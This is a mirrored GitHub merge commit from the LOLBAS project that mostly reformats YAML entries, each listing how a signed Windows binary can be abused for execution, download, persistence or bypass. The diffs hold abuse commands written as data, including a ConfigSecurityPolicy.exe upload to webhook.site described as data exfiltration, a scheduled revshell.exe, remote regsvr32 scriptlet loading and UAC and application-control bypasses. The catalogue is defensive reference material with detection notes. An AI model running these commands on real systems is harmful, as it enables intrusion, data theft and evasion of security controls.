mirror of
https://github.com/LOLBAS-Project/LOLBAS
synced 2024-12-25 14:29:24 +01:00
Merge branch 'master' into feat/yamllinting
This commit is contained in:
commit
9f9af1cfee
@ -14,4 +14,6 @@ Code_Sample: []
|
||||
Detection: []
|
||||
Resources:
|
||||
- https://twitter.com/bohops/status/986984122563391488
|
||||
Notes: Thanks to Jimmy - @bohops
|
||||
Acknowledgement:
|
||||
- Person: Jimmy
|
||||
Handle: '@bohops'
|
@ -22,4 +22,6 @@ Resources:
|
||||
- https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Persistence/Netsh_Helper_DLL.md
|
||||
- https://attack.mitre.org/wiki/Technique/T1128
|
||||
- https://twitter.com/teemuluotio/status/990532938952527873
|
||||
Notes: ''
|
||||
Acknowledgement:
|
||||
- Person: ''
|
||||
- Handle: ''
|
@ -2,8 +2,7 @@
|
||||
Name: Nltest.exe
|
||||
Description: Credentials
|
||||
Author: ''
|
||||
Created: '2018-05-25'
|
||||
Categories: []
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: nltest.exe /SERVER:192.168.1.10 /QUERY
|
||||
Description: ''
|
||||
@ -14,4 +13,6 @@ Detection: []
|
||||
Resources:
|
||||
- https://twitter.com/sysopfb/status/986799053668139009
|
||||
- https://ss64.com/nt/nltest.html
|
||||
Notes: Thanks to Sysopfb - @sysopfb
|
||||
Acknowledgement:
|
||||
- Person: Sysopfb
|
||||
Handle: '@sysopfb'
|
||||
|
@ -3,7 +3,6 @@ Name: Openwith.exe
|
||||
Description: Execute
|
||||
Author: ''
|
||||
Created: '2018-05-25'
|
||||
Categories: []
|
||||
Commands:
|
||||
- Command: OpenWith.exe /c C:\test.hta
|
||||
Description: Opens the target file with the default application.
|
||||
@ -16,4 +15,6 @@ Code_Sample: []
|
||||
Detection: []
|
||||
Resources:
|
||||
- https://twitter.com/harr0ey/status/991670870384021504
|
||||
Notes: Thanks to Matt harr0ey - @harr0ey
|
||||
Acknowledgement:
|
||||
- Person: Matt harr0ey
|
||||
Handle: '@harr0ey'
|
@ -3,7 +3,6 @@ Name: Powershell.exe
|
||||
Description: Execute, Read ADS
|
||||
Author: ''
|
||||
Created: '2018-05-25'
|
||||
Categories: []
|
||||
Commands:
|
||||
- Command: powershell -ep bypass - < c:\temp:ttt
|
||||
Description: Execute the encoded PowerShell command stored in an Alternate Data Stream (ADS).
|
||||
@ -14,4 +13,6 @@ Code_Sample: []
|
||||
Detection: []
|
||||
Resources:
|
||||
- https://twitter.com/Moriarty_Meng/status/984380793383370752
|
||||
Notes: Thanks to Moriarty - @Moriarty_Meng
|
||||
Acknowledgement:
|
||||
- Person: Moriarty
|
||||
Handle: '@Moriarty_Meng'
|
@ -18,4 +18,6 @@ Code_Sample: []
|
||||
Detection: []
|
||||
Resources:
|
||||
- https://www.sans.org/summit-archives/file/summit-archive-1493861893.pdf
|
||||
Notes: 'Thanks to '
|
||||
Acknowledgement:
|
||||
- Person: ''
|
||||
- Handle: ''
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Robocopy.exe
|
||||
Description: Copy
|
||||
Author: ''
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Categories: []
|
||||
Commands:
|
||||
- Command: Robocopy.exe C:\SourceFolder C:\DestFolder
|
||||
@ -16,4 +16,6 @@ Code_Sample: []
|
||||
Detection: []
|
||||
Resources:
|
||||
- https://social.technet.microsoft.com/wiki/contents/articles/1073.robocopy-and-a-few-examples.aspx
|
||||
Notes: Thanks to Name of guy - @twitterhandle
|
||||
Acknowledgement:
|
||||
- Person: ''
|
||||
- Handle: ''
|
@ -2,8 +2,7 @@
|
||||
Name: AcroRd32.exe
|
||||
Description: Execute
|
||||
Author: ''
|
||||
Created: '2018-05-25'
|
||||
Categories: []
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: Replace C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe by your binary
|
||||
Description: Hijack RdrCEF.exe with a payload executable to launch when opening Adobe
|
||||
@ -13,4 +12,6 @@ Code_Sample: []
|
||||
Detection: []
|
||||
Resources:
|
||||
- https://twitter.com/pabraeken/status/997997818362155008
|
||||
Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken
|
||||
Acknowledgement:
|
||||
- Person: Pierre-Alexandre Braeken
|
||||
Handle: '@pabraeken'
|
||||
|
@ -2,8 +2,7 @@
|
||||
Name: Gpup.exe
|
||||
Description: Execute
|
||||
Author: ''
|
||||
Created: '2018-05-25'
|
||||
Categories: []
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: Gpup.exe -w whatever -e c:\Windows\System32\calc.exe
|
||||
Description: Execute another command through gpup.exe (Notepad++ binary).
|
||||
@ -13,4 +12,6 @@ Code_Sample: []
|
||||
Detection: []
|
||||
Resources:
|
||||
- https://twitter.com/pabraeken/status/997892519827558400
|
||||
Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken
|
||||
Acknowledgement:
|
||||
- Person: Pierre-Alexandre Braeken
|
||||
Handle: '@pabraeken'
|
||||
|
@ -2,8 +2,7 @@
|
||||
Name: Nlnotes.exe
|
||||
Description: Execute
|
||||
Author: ''
|
||||
Created: '2018-05-25'
|
||||
Categories: []
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: NLNOTES.EXE /authenticate "=N:\Lotus\Notes\Data\notes.ini" -Command if((Get-ExecutionPolicy ) -ne AllSigned) { Set-ExecutionPolicy -Scope Process Bypass }
|
||||
Description: Run PowerShell via LotusNotes.
|
||||
@ -14,4 +13,6 @@ Detection: []
|
||||
Resources:
|
||||
- https://gist.github.com/danielbohannon/50ec800e92a888b7d45486e5733c359f
|
||||
- https://twitter.com/HanseSecure/status/995578436059127808
|
||||
Notes: Thanks to Daniel Bohannon - @danielhbohannon
|
||||
Acknowledgement:
|
||||
- Person: Daniel Bohannon
|
||||
Handle: '@danielhbohannon'
|
||||
|
@ -2,8 +2,7 @@
|
||||
Name: Notes.exe
|
||||
Description: Execute
|
||||
Author: ''
|
||||
Created: '2018-05-25'
|
||||
Categories: []
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: Notes.exe "=N:\Lotus\Notes\Data\notes.ini" -Command if((Get-ExecutionPolicy) -ne AllSigned) { Set-ExecutionPolicy -Scope Process Bypass }
|
||||
Description: Run PowerShell via LotusNotes.
|
||||
@ -14,4 +13,6 @@ Detection: []
|
||||
Resources:
|
||||
- https://gist.github.com/danielbohannon/50ec800e92a888b7d45486e5733c359f
|
||||
- https://twitter.com/HanseSecure/status/995578436059127808
|
||||
Notes: Thanks to Daniel Bohannon - @danielhbohannon
|
||||
Acknowledgement:
|
||||
- Person: Daniel Bohannon
|
||||
Handle: '@danielhbohannon'
|
||||
|
@ -2,8 +2,7 @@
|
||||
Name: Nvudisp.exe
|
||||
Description: Execute, Copy, Add registry, Create shortcut, kill process
|
||||
Author: ''
|
||||
Created: '2018-05-25'
|
||||
Categories: []
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: Nvudisp.exe System calc.exe
|
||||
Description: Execute calc.exe as a subprocess.
|
||||
@ -23,4 +22,7 @@ Code_Sample: []
|
||||
Detection: []
|
||||
Resources:
|
||||
- http://sysadminconcombre.blogspot.ca/2018/04/run-system-commands-through-nvidia.html
|
||||
Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken
|
||||
Acknowledgement:
|
||||
- Person: Pierre-Alexandre Braeken
|
||||
Handle: '@pabraeken'
|
||||
|
||||
|
@ -2,8 +2,7 @@
|
||||
Name: Nvuhda6.exe
|
||||
Description: Execute, Copy, Add registry, Create shortcut, kill process
|
||||
Author: ''
|
||||
Created: '2018-05-25'
|
||||
Categories: []
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: nvuhda6.exe System calc.exe
|
||||
Description: Execute calc.exe as a subprocess.
|
||||
@ -23,4 +22,6 @@ Code_Sample: []
|
||||
Detection: []
|
||||
Resources:
|
||||
- http://www.hexacorn.com/blog/2017/11/10/reusigned-binaries-living-off-the-signed-land/
|
||||
Notes: Thanks to Adam - @hexacorn
|
||||
Acknowledgement:
|
||||
- Person: Adam
|
||||
Handle: '@hexacorn'
|
||||
|
@ -2,8 +2,7 @@
|
||||
Name: ROCCAT_Swarm.exe
|
||||
Description: Execute
|
||||
Author: ''
|
||||
Created: '2018-05-25'
|
||||
Categories: []
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: Replace ROCCAT_Swarm_Monitor.exe with your binary.exe
|
||||
Description: Hijack ROCCAT_Swarm_Monitor.exe and launch payload when executing ROCCAT_Swarm.exe
|
||||
@ -13,4 +12,6 @@ Code_Sample: []
|
||||
Detection: []
|
||||
Resources:
|
||||
- https://twitter.com/pabraeken/status/994213164484001793
|
||||
Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken
|
||||
Acknowledgement:
|
||||
- Person: Pierre-Alexandre Braeken
|
||||
Handle: '@pabraeken'
|
||||
|
@ -2,8 +2,7 @@
|
||||
Name: Setup.exe
|
||||
Description: Execute
|
||||
Author: ''
|
||||
Created: '2018-05-25'
|
||||
Categories: []
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: Run Setup.exe
|
||||
Description: Hijack hpbcsiServiceMarshaller.exe and run Setup.exe to launch a payload.
|
||||
@ -13,4 +12,6 @@ Code_Sample: []
|
||||
Detection: []
|
||||
Resources:
|
||||
- https://twitter.com/pabraeken/status/994381620588236800
|
||||
Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken
|
||||
Acknowledgement:
|
||||
- Person: Pierre-Alexandre Braeken
|
||||
Handle: '@pabraeken'
|
||||
|
@ -2,8 +2,7 @@
|
||||
Name: Usbinst.exe
|
||||
Description: Execute
|
||||
Author: ''
|
||||
Created: '2018-05-25'
|
||||
Categories: []
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: Usbinst.exe InstallHinfSection "DefaultInstall 128 c:\temp\calc.inf"
|
||||
Description: Execute calc.exe through DefaultInstall Section Directive in INF file.
|
||||
@ -13,4 +12,6 @@ Code_Sample: []
|
||||
Detection: []
|
||||
Resources:
|
||||
- https://twitter.com/pabraeken/status/993514357807108096
|
||||
Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken
|
||||
Acknowledgement:
|
||||
- Person: Pierre-Alexandre Braeken
|
||||
Handle: '@pabraeken'
|
||||
|
@ -2,8 +2,7 @@
|
||||
Name: VBoxDrvInst.exe
|
||||
Description: Persistence
|
||||
Author: ''
|
||||
Created: '2018-05-25'
|
||||
Categories: []
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: VBoxDrvInst.exe driver executeinf c:\temp\calc.inf
|
||||
Description: Set registry key-value for persistance via INF file call through VBoxDrvInst.exe
|
||||
@ -13,4 +12,6 @@ Code_Sample: []
|
||||
Detection: []
|
||||
Resources:
|
||||
- https://twitter.com/pabraeken/status/993497996179492864
|
||||
Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken
|
||||
Acknowledgement:
|
||||
- Person: Pierre-Alexandre Braeken
|
||||
Handle: '@pabraeken'
|
||||
|
@ -1,7 +1,7 @@
|
||||
Name: aswrundll.exe
|
||||
Description: This process is used by AVAST antivirus to run and execute any modules
|
||||
Author: Eli Salem
|
||||
Created: 19\03\2019
|
||||
Created: '2019-03-19'
|
||||
Commands:
|
||||
- Command: '"C:\Program Files\Avast Software\Avast\aswrundll" "C:\Users\Public\Libraries\tempsys\module.dll"'
|
||||
Description: Load and execute modules using aswrundll
|
||||
@ -17,4 +17,4 @@ Resources:
|
||||
- Link: https://www.cybereason.com/blog/information-stealing-malware-targeting-brazil-full-research
|
||||
Acknowledgement:
|
||||
- Person: Eli Salem
|
||||
handle: https://www.linkedin.com/in/eli-salem-954728150
|
||||
handle: 'https://www.linkedin.com/in/eli-salem-954728150'
|
@ -2,7 +2,7 @@
|
||||
Name: winword.exe
|
||||
Description: Document editor included with Microsoft Office.
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: winword.exe /l dllfile.dll
|
||||
Description: Launch DLL payload.
|
||||
@ -10,7 +10,7 @@ Commands:
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
MItreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows
|
||||
Full_Path:
|
||||
- Path: c:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
|
||||
|
@ -2,18 +2,18 @@
|
||||
Name: testxlst.js
|
||||
Description: Script included with Pywin32.
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: cscript testxlst.js C:\test\test.xml c:\test\test.xls c:\test\test.out
|
||||
Description: Test Jscript included in Python tool to perform XSL transform (for payload execution).
|
||||
Categories: Execution
|
||||
Category: Execution
|
||||
Privileges: User
|
||||
MitreID: T1064
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1064
|
||||
OperatingSystem: Windows
|
||||
- Command: wscript testxlst.js C:\test\test.xml c:\test\test.xls c:\test\test.out
|
||||
Description: Test Jscript included in Python tool to perform XSL transform (for payload execution).
|
||||
Categories: Execution
|
||||
Category: Execution
|
||||
Privileges: User
|
||||
MitreID: T1064
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1064
|
||||
@ -25,4 +25,6 @@ Detection: []
|
||||
Resources:
|
||||
- https://twitter.com/bohops/status/993314069116485632
|
||||
- https://github.com/mhammond/pywin32
|
||||
Notes: Thanks to Jimmy - @bohops
|
||||
Acknowledgement:
|
||||
- Person: Jimmy
|
||||
Handle: '@bohops'
|
||||
|
28
yml/OSBinaries/Aspnet_Compiler.yml
Normal file
28
yml/OSBinaries/Aspnet_Compiler.yml
Normal file
@ -0,0 +1,28 @@
|
||||
---
|
||||
Name: Aspnet_Compiler.exe
|
||||
Description: ASP.NET Compilation Tool
|
||||
Author: Jimmy (@bohops)
|
||||
Created: 2021-09-26
|
||||
Commands:
|
||||
- Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe -v none -p C:\users\cpl.internal\desktop\asptest\ -f C:\users\cpl.internal\desktop\asptest\none -u
|
||||
Description: Execute C# code with the Build Provider and proper folder structure in place.
|
||||
Usecase: Execute proxied payload with Microsoft signed binary to bypass application control solutions
|
||||
Category: AWL Bypass
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/techniques/T1218/
|
||||
OperatingSystem: Windows 10
|
||||
Full_Path:
|
||||
- Path: c:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
|
||||
- Path: c:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
|
||||
Code_Sample:
|
||||
- Code: https://github.com/ThunderGunExpress/BringYourOwnBuilder
|
||||
Detection:
|
||||
- IOC: Sysmon Event ID 1 - Process Creation
|
||||
Resources:
|
||||
- Link: https://ijustwannared.team/2020/08/01/the-curious-case-of-aspnet_compiler-exe/
|
||||
- Link: https://docs.microsoft.com/en-us/dotnet/api/system.web.compilation.buildprovider.generatecode?view=netframework-4.8
|
||||
Acknowledgement:
|
||||
- Person: cpl
|
||||
Handle: '@cpl3h'
|
||||
---
|
@ -2,7 +2,7 @@
|
||||
Name: At.exe
|
||||
Description: Schedule periodic tasks
|
||||
Author: 'Freddie Barr-Smith'
|
||||
Created: '2019-09-20'
|
||||
Created: 2019-09-20
|
||||
Commands:
|
||||
- Command: C:\Windows\System32\at.exe at 09:00 /interactive /every:m,t,w,th,f,s,su C:\Windows\System32\revshell.exe
|
||||
Description: Create a recurring task to execute every day at a specific time.
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Atbroker.exe
|
||||
Description: Helper binary for Assistive Technology (AT)
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: ATBroker.exe /start malware
|
||||
Description: Start a registered Assistive Technology (AT).
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Bash.exe
|
||||
Description: File used by Windows subsystem for Linux
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: bash.exe -c calc.exe
|
||||
Description: Executes calc.exe from bash.exe
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Bitsadmin.exe
|
||||
Description: Used for managing background intelligent transfer
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: bitsadmin /create 1 bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\1.txt:cmd.exe NULL bitsadmin /RESUME 1 bitsadmin /complete 1
|
||||
Description: Create a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command from an Alternate data stream, then resume and complete the job.
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: CertReq.exe
|
||||
Description: Used for requesting and managing certificates
|
||||
Author: 'David Middlehurst'
|
||||
Created: '2020-07-07'
|
||||
Created: 2020-07-07
|
||||
Commands:
|
||||
- Command: CertReq -Post -config https://example.org/ c:\windows\win.ini output.txt
|
||||
Description: Save the response from a HTTP POST to the endpoint https://example.org/ as output.txt in the current directory
|
||||
|
@ -1,8 +1,8 @@
|
||||
---
|
||||
Name: Certutil.exe
|
||||
Description: Windows binary used for handeling certificates
|
||||
Description: Windows binary used for handling certificates
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: certutil.exe -urlcache -split -f http://7-zip.org/a/7z1604-x64.exe 7zip.exe
|
||||
Description: Download and save 7zip to disk in the current folder.
|
||||
|
@ -2,9 +2,9 @@
|
||||
Name: Cmd.exe
|
||||
Description: The command-line interpreter in Windows
|
||||
Author: 'Ye Yint Min Thu Htut'
|
||||
Created: '2019-06-26'
|
||||
Created: 2019-06-26
|
||||
Commands:
|
||||
- Command: cmd.exe /c echo regsvr32.exe ^/s ^/u ^/i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct ^scrobj.dll > fakefile.doc:payload.bat
|
||||
- Command: cmd.exe /c echo regsvr32.exe ^/s ^/u ^/i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.010/src/RegSvr32.sct ^scrobj.dll > fakefile.doc:payload.bat
|
||||
Description: Add content to an Alternate Data Stream (ADS).
|
||||
Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism
|
||||
Category: ADS
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Cmdkey.exe
|
||||
Description: creates, lists, and deletes stored user names and passwords or credentials.
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: cmdkey /list
|
||||
Description: List cached credentials
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Cmstp.exe
|
||||
Description: Installs or removes a Connection Manager service profile.
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: cmstp.exe /ni /s c:\cmstp\CorpVPN.inf
|
||||
Description: Silently installs a specially formatted local .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll.
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: ConfigSecurityPolicy.exe
|
||||
Description: Binary part of Windows Defender. Used to manage settings in Windows Defender. you can configure different pilot collections for each of the co-management workloads. Being able to use different pilot collections allows you to take a more granular approach when shifting workloads.
|
||||
Author: 'Ialle Teixeira'
|
||||
Created: '04/09/2020'
|
||||
Created: 2020-09-04
|
||||
Commands:
|
||||
- Command: ConfigSecurityPolicy.exe C:\\Windows\\System32\\calc.exe https://webhook.site/xxxxxxxxx?encodedfile
|
||||
Description: Upload file, credentials or data exfiltration in general
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Control.exe
|
||||
Description: Binary used to launch controlpanel items in Windows
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: control.exe c:\windows\tasks\file.txt:evil.dll
|
||||
Description: Execute evil.dll which is stored in an Alternate Data Stream (ADS).
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Csc.exe
|
||||
Description: Binary file used by .NET to compile C# code
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: csc.exe -out:My.exe File.cs
|
||||
Description: Use CSC.EXE to compile C# code stored in File.cs and output the compiled version to My.exe.
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Cscript.exe
|
||||
Description: Binary used to execute scripts in Windows
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: cscript c:\ads\file.txt:script.vbs
|
||||
Description: Use cscript.exe to exectute a Visual Basic script stored in an Alternate Data Stream (ADS).
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Desktopimgdownldr.exe
|
||||
Description: Windows binary used to configure lockscreen/desktop image
|
||||
Author: Gal Kristal
|
||||
Created: 28/06/2020
|
||||
Created: 2020-06-28
|
||||
Commands:
|
||||
- Command: set "SYSTEMROOT=C:\Windows\Temp" && cmd /c desktopimgdownldr.exe /lockscreenurl:https://domain.com:8080/file.ext /eventName:desktopimgdownldr
|
||||
Description: Downloads the file and sets it as the computer's lockscreen
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Dfsvc.exe
|
||||
Description: ClickOnce engine in Windows used by .NET
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: rundll32.exe dfshim.dll,ShOpenVerbApplication http://www.domain.com/application/?param1=foo
|
||||
Description: Executes click-once-application from Url
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Diantz.exe
|
||||
Description: Binary that package existing files into a cabinet (.cab) file
|
||||
Author: 'Tamir Yehuda'
|
||||
Created: '08/08/2020'
|
||||
Created: 2020-08-08
|
||||
Commands:
|
||||
- Command: diantz.exe c:\pathToFile\file.exe c:\destinationFolder\targetFile.txt:targetFile.cab
|
||||
Description: Compress taget file into a cab file stored in the Alternate Data Stream (ADS) of the target file.
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Diskshadow.exe
|
||||
Description: Diskshadow.exe is a tool that exposes the functionality offered by the volume shadow copy Service (VSS).
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: diskshadow.exe /s c:\test\diskshadow.txt
|
||||
Description: Execute commands using diskshadow.exe from a prepared diskshadow script.
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Dnscmd.exe
|
||||
Description: A command-line interface for managing DNS servers
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: dnscmd.exe dc1.lab.int /config /serverlevelplugindll \\192.168.0.149\dll\wtf.dll
|
||||
Description: Adds a specially crafted DLL as a plug-in of the DNS Service. This command must be run on a DC by a user that is at least a member of the DnsAdmins group. See the reference links for DLL details.
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Esentutl.exe
|
||||
Description: Binary for working with Microsoft Joint Engine Technology (JET) database
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: esentutl.exe /y C:\folder\sourcefile.vbs /d C:\folder\destfile.vbs /o
|
||||
Description: Copies the source VBS file to the destination VBS file.
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Eventvwr.exe
|
||||
Description: Displays Windows Event Logs in a GUI window.
|
||||
Author: 'Jacob Gajek'
|
||||
Created: '2018-11-01'
|
||||
Created: 2018-11-01
|
||||
Commands:
|
||||
- Command: eventvwr.exe
|
||||
Description: During startup, eventvwr.exe checks the registry value HKCU\Software\Classes\mscfile\shell\open\command for the location of mmc.exe, which is used to open the eventvwr.msc saved console file. If the location of another binary or script is added to this registry value, it will be executed as a high-integrity process without a UAC prompt being displayed to the user.
|
||||
@ -15,7 +15,7 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\eventvwr.exe
|
||||
- Path: C:\Windows\SysWOW64\eventvwr.exe
|
||||
Code Sample:
|
||||
Code_Sample:
|
||||
- Code: https://github.com/enigma0x3/Misc-PowerShell-Stuff/blob/master/Invoke-EventVwrBypass.ps1
|
||||
Detection:
|
||||
- IOC: eventvwr.exe launching child process other than mmc.exe
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Expand.exe
|
||||
Description: Binary that expands one or more compressed files
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: expand \\webdav\folder\file.bat c:\ADS\file.bat
|
||||
Description: Copies source file to destination.
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Explorer.exe
|
||||
Description: Binary used for managing files and system components within Windows
|
||||
Author: 'Jai Minton'
|
||||
Created: '2020-06-24'
|
||||
Created: 2020-06-24
|
||||
Commands:
|
||||
- Command: explorer.exe /root,"C:\Windows\System32\calc.exe"
|
||||
Description: Execute calc.exe with the parent process spawning from a new instance of explorer.exe
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Extexport.exe
|
||||
Description:
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: Extexport.exe c:\test foo bar
|
||||
Description: Load a DLL located in the c:\test folder with one of the following names mozcrt19.dll, mozsqlite3.dll, or sqlite.dll
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Extrac32.exe
|
||||
Description:
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe
|
||||
Description: Extracts the source CAB file into an Alternate Data Stream (ADS) of the target file.
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Findstr.exe
|
||||
Description:
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: findstr /V /L W3AllLov3DonaldTrump c:\ADS\file.exe > c:\ADS\file.txt:file.exe
|
||||
Description: Searches for the string W3AllLov3DonaldTrump, since it does not exist (/V) file.exe is written to an Alternate Data Stream (ADS) of the file.txt file.
|
||||
@ -42,7 +42,7 @@ Full_Path:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: finstr.exe should normally not be invoked on a client system
|
||||
- IOC: findstr.exe should normally not be invoked on a client system
|
||||
Resources:
|
||||
- Link: https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/
|
||||
- Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Forfiles.exe
|
||||
Description: Selects and executes a command on a file or set of files. This command is useful for batch processing.
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe
|
||||
Description: Executes calc.exe since there is a match for notepad.exe in the c:\windows\System32 folder.
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Ftp.exe
|
||||
Description: A binary designed for connecting to FTP servers
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-12-10'
|
||||
Created: 2018-12-10
|
||||
Commands:
|
||||
- Command: echo !calc.exe > ftpcommands.txt && ftp -s:ftpcommands.txt
|
||||
Description: Executes the commands you put inside the text file.
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: GfxDownloadWrapper.exe
|
||||
Description: Remote file download used by the Intel Graphics Control Panel, receives as first parameter a URL and a destination file path.
|
||||
Author: Jesus Galvez
|
||||
Created: Jesus Galvez
|
||||
Created: 2019-12-27
|
||||
Commands:
|
||||
- Command: C:\Windows\System32\DriverStore\FileRepository\igdlh64.inf_amd64_[0-9]+\GfxDownloadWrapper.exe "URL" "DESTINATION FILE"
|
||||
Description: GfxDownloadWrapper.exe downloads the content that returns URL and writes it to the file DESTINATION FILE PATH. The binary is signed by "Microsoft Windows Hardware", "Compatibility Publisher", "Microsoft Windows Third Party Component CA 2012", "Microsoft Time-Stamp PCA 2010", "Microsoft Time-Stamp Service".
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Gpscript.exe
|
||||
Description: Used by group policy to process scripts
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: Gpscript /logon
|
||||
Description: Executes logon scripts configured in Group Policy.
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Hh.exe
|
||||
Description: Binary used for processing chm files in Windows
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
